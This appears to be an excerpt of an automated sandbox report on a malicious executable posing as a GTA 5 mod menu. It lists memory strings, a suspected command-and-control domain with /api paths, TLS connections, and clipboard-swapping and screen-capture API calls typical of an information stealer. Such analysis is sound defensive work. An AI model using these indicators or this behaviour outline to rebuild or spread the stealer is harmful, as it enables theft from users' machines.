Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2160705276.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136057544.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2160514504.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2137052378.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2196493094.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2191993224.0000000003597000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2108339651.0000000003549000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136299155.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2146796814.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830538031.0000000003536000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2146894898.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830464050.000000000352C000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338561708.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202624391.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338011938.0000000003537000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2192015847.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2191993224.0000000003597000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830428069.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api9v&?
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiH$0?
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apie
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338561708.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202624391.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830428069.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apizv
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2146796814.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147024672.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api_seed_date
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148144892.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49728 version: TLS 1.2

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 4_2_00432280 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

4_2_00432280

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 4_2_05AD1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

4_2_05AD1000

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 4_2_00432280 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

4_2_00432280

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Code function: 4_2_004328F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

4_2_004328F0

Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F9EA4E	0_2_00F9EA4E
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00FA04C2	0_2_00FA04C2
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F93400	0_2_00F93400
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F8DDA2	0_2_00F8DDA2
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 0_2_00F8969B	0_2_00F8969B
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F9EA4E	3_2_00F9EA4E
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00FA04C2	3_2_00FA04C2
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F93400	3_2_00F93400
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F8DDA2	3_2_00F8DDA2
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 3_2_00F8969B	3_2_00F8969B
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00437960	4_2_00437960
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00422111	4_2_00422111
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043F1A0	4_2_0043F1A0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00426260	4_2_00426260
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043026B	4_2_0043026B
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043B270	4_2_0043B270
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0040BB47	4_2_0040BB47
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00409BE0	4_2_00409BE0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004153E8	4_2_004153E8
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0040D3F6	4_2_0040D3F6
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043FC30	4_2_0043FC30
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00437C80	4_2_00437C80
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00420DE0	4_2_00420DE0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00440660	4_2_00440660
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042BE7C	4_2_0042BE7C
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00411E10	4_2_00411E10
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041071B	4_2_0041071B
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00408780	4_2_00408780
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042F050	4_2_0042F050
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00432010	4_2_00432010
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00440820	4_2_00440820
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004240C3	4_2_004240C3
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043E8C0	4_2_0043E8C0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004238EB	4_2_004238EB
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00439080	4_2_00439080
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043F8A0	4_2_0043F8A0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00403940	4_2_00403940
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00438950	4_2_00438950
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00405960	4_2_00405960
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042A160	4_2_0042A160
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00418166	4_2_00418166
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00416913	4_2_00416913
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043611F	4_2_0043611F
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004061C0	4_2_004061C0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0040A9C0	4_2_0040A9C0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004281D3	4_2_004281D3
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004371D0	4_2_004371D0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004081E0	4_2_004081E0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004259E0	4_2_004259E0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0040B1A5	4_2_0040B1A5
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041D9B0	4_2_0041D9B0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004219B0	4_2_004219B0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00409270	4_2_00409270
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042EA71	4_2_0042EA71
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00424A08	4_2_00424A08
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042E209	4_2_0042E209
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00422A31	4_2_00422A31
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00439235	4_2_00439235
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00415AD0	4_2_00415AD0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004162DD	4_2_004162DD
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004042F0	4_2_004042F0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004292F3	4_2_004292F3
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00414280	4_2_00414280
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043EB60	4_2_0043EB60
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00436B67	4_2_00436B67
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00411377	4_2_00411377
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041F3DA	4_2_0041F3DA
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041D3E0	4_2_0041D3E0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043BB80	4_2_0043BB80
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00402BA0	4_2_00402BA0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00419440	4_2_00419440
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00427449	4_2_00427449
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042F45F	4_2_0042F45F
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00448460	4_2_00448460
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00427472	4_2_00427472
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00420470	4_2_00420470
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00417C0E	4_2_00417C0E
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00407430	4_2_00407430
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00404C30	4_2_00404C30
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00437430	4_2_00437430
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042C4D2	4_2_0042C4D2
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043F4D0	4_2_0043F4D0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0040E4DE	4_2_0040E4DE
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041BCF0	4_2_0041BCF0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041CC80	4_2_0041CC80
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0043CC95	4_2_0043CC95
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00430540	4_2_00430540
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042C559	4_2_0042C559
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0041A570	4_2_0041A570
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00427D0D	4_2_00427D0D
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00418DC3	4_2_00418DC3
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042FDDC	4_2_0042FDDC
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_004265E0	4_2_004265E0
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_0042C5EC	4_2_0042C5EC
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00406650	4_2_00406650
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00431E00	4_2_00431E00
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00416E0E	4_2_00416E0E
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00405E20	4_2_00405E20
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00428630	4_2_00428630
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00446EC7	4_2_00446EC7
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00446ECF	4_2_00446ECF
Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe	Code function: 4_2_00446ECB	4_2_00446ECB
